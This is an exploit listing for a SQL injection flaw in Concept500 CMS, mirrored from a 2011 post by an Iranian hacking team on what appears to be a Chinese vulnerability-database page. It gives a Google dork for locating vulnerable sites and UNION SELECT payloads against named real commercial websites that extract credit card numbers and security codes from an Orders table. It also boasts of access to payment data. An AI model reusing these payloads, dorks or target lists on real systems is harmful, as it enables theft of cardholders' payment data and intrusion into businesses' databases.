Concept500 CMS SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1048858 漏洞类型
发布时间 2011-08-10 更新时间 2011-08-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2011080061
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Concept500 CMS SQL Injection Vulnerability
# Google Dork: [inurl : inurl:viewItem.php?id= ]
# Date: 2011-07-08
# Author: Sepehr Security Team
# Discovered By: H3X
# Software Site:  http://www.concept500.co.uk/
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Expl0it :]
http://www.[sitename].com/viewitem.php?id=[SQL Injection]

[DEMO:]

1 ) http://www.mycommissionbid.com/bid/viewitem.php?id=-487+union+select+1,group_concat%28SecurityNo,0x3a,CardNo%29,3,4,5,6,7,8,9,10,11+from+Orders--

2)  http://www.historicflyingclothing.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--

3) http://www.hiscoll.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
and more ...

[Note :]

with this vulnerability you can get direct access to payment information same as paypal and other card information on database.
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Spc. Thanks :]
thE_Knight | Einstein | W!z4rd  | Naboodgar | CONS7ANTINE | Mr.Amir-Masoud| nImaarek | GrEEn-ErRor | Net.Plus | Cruel 
All Sepehr Sceurity Team Members And All Iranian Hack3rs
[Home Page :]
 wWw.Sepehr-Team.orG